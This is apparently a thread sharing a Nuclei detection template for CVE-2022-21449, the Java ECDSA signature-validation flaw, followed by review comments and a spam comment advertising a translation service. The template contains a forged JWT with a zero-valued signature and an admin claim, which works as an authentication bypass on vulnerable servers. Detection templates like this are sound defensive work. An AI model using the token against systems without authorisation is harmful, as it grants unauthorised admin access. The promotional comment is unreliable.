Nuclei template to detect exposure to CVE-2022-21449 by the JWT validation API in place.

CVE-2022-21449.yaml

id: CVE-2022-21449

info:
  name: CVE-2022-21449 test exposure
  description: The JDK 15-18 have a vulnerability in validation of ECDSA signature so this template detect exposure to CVE-2022-21449 by the JWT validation API in place.
  author: righettod
  severity: info
  tags: cve,2022,java
  reference: https://neilmadden.blog/2022/04/19/psychic-signatures-in-java

requests:
  - raw:
      - |
        GET /?id={{randstr}} HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: no-store

      - |
        GET /?id={{randstr}} HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJSaWNrIEFzdGxleSIsImFkbWluIjp0cnVlLCJpYXQiOjE2NTA0NjY1MDIsImV4cCI6MTkwMDQ3MDEwMn0.MAYCAQACAQA
        Cache-Control: no-store
        

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - '(status_code_1 == 403 || status_code_1 == 401) && status_code_2 == 200'

Yes, you have 100% right. It was a first proposal and I will refactor it to decrease the probability of false-positive.

@daffainfo I updated the template to try decreasing the probability of false-positive:

looks so much better

Thank you.

I am looking for the Nuclei template to detect exposure to CVE-2022-21449 by the JWT validation API in place and I am glad I found your post. I was searching for the translation service online and found this https://pickwriters.com/spanish-translation-services link as well as I found link to your post on google search and it saved my a lot of time in searching for your post.